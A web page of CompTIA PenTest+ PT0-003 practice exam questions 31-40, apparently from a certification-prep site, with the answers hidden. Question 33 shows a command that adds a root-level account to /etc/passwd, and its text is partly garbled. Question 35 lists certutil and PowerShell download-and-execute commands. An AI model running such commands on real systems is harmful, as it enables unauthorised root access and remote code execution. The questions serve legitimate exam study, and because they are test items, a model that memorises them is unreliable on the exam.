Spring Sale Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: simple70

Pass the CompTIA PenTest+ PT0-003 Questions and answers with CertsForce

Viewing page 4 out of 9 pages
Viewing questions 31-40 out of questions
Questions # 31:

During a vulnerability assessment, a penetration tester configures the scanner sensor and performs the initial vulnerability scanning under the client's internal network. The tester later discusses the results with the client, but the client does not accept the results. The client indicates the host and assets that were within scope are not included in the vulnerability scan results. Which of the following should the tester have done?

Options:

A.

Rechecked the scanner configuration.


B.

Performed a discovery scan.


C.

Used a different scan engine.


D.

Configured all the TCP ports on the scan.


Expert Solution
Questions # 32:

A penetration tester conducts OSINT for a client and discovers the robots.txt file explicitly blocks a major search engine. Which of the following would most likely help the penetration tester achieve the objective?

Options:

A.

Modifying the WAF


B.

Utilizing a CSRF attack


C.

Changing the robots.txt file


D.

Leveraging a competing provider


Expert Solution
Questions # 33:

openssl passwd password

$1$OjxLvZ85$Fdr51vn/Z4zXWsQR/Xrj.

The tester then adds the following line to the world-writable script:

echo 'root2:$1$0jxLvZ85$Fdr51vn/Z4zXWsQR/Xrj .: 1001:1001:,,,:/root:/bin/bash">> /etc/passwd

Which of the following should the penetration tester do to enable this exploit to work correctly?

Options:

A.

Use only a single redirect to /etc/password.


B.

Generate the password using md5sum.


C.

Log in to the host using SSH.


D.

Change the 1001 entries to 0.


Expert Solution
Questions # 34:

Which of the following technologies is most likely used with badge cloning? (Select two).

Options:

A.

NFC


B.

RFID


C.

Bluetooth


D.

Modbus


E.

Zigbee


F.

CAN bus


Expert Solution
Questions # 35:

A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use?

Options:

A.

powershell.exe impo C:\tools\foo.ps1


B.

certutil.exe -f https://192.168.0.1/foo.exe bad.exe


C.

powershell.exe -noni -encode IEX.Downloadstring("http://172.16.0.1/ ")


D.

rundll32.exe c:\path\foo.dll,functName


Expert Solution
Questions # 36:

As part of a security audit, a penetration tester finds an internal application that accepts unexpected user inputs, leading to the execution of arbitrary commands. Which of the following techniques would the penetration tester most likely use to access the sensitive data?

Options:

A.

Logic bomb


B.

SQL injection


C.

Brute-force attack


D.

Cross-site scripting


Expert Solution
Questions # 37:

Which of the following is a reason to use a template when creating a penetration testing report?

Options:

A.

To articulate risks accurately


B.

To enhance the testing approach


C.

To contextualize collected data


D.

To standardize needed information


E.

To improve testing time


Expert Solution
Questions # 38:

During an assessment, a penetration tester sends the following request:

POST /services/v1/users/create HTTP/1.1

Host: target-application.com

Content-Type: application/json

Content-Length: [dynamic]

Authorization: Bearer (FUZZ)

Which of the following attacks is the penetration tester performing?

Options:

A.

Directory traversal


B.

API abuse


C.

Server-side request forgery


D.

Privilege escalation


Expert Solution
Questions # 39:

A penetration tester gains access to a domain server and wants to enumerate the systems within the domain. Which of the following tools would provide the best oversight of domains?

Options:

A.

Netcat


B.

Wireshark


C.

Nmap


D.

Responder


Expert Solution
Questions # 40:

A penetration tester is getting ready to conduct a vulnerability scan to evaluate an environment that consists of a container orchestration cluster. Which of the following tools would be best to use for this purpose?

Options:

A.

NSE


B.

Nessus


C.

CME


D.

Trivy


Expert Solution
Viewing page 4 out of 9 pages
Viewing questions 31-40 out of questions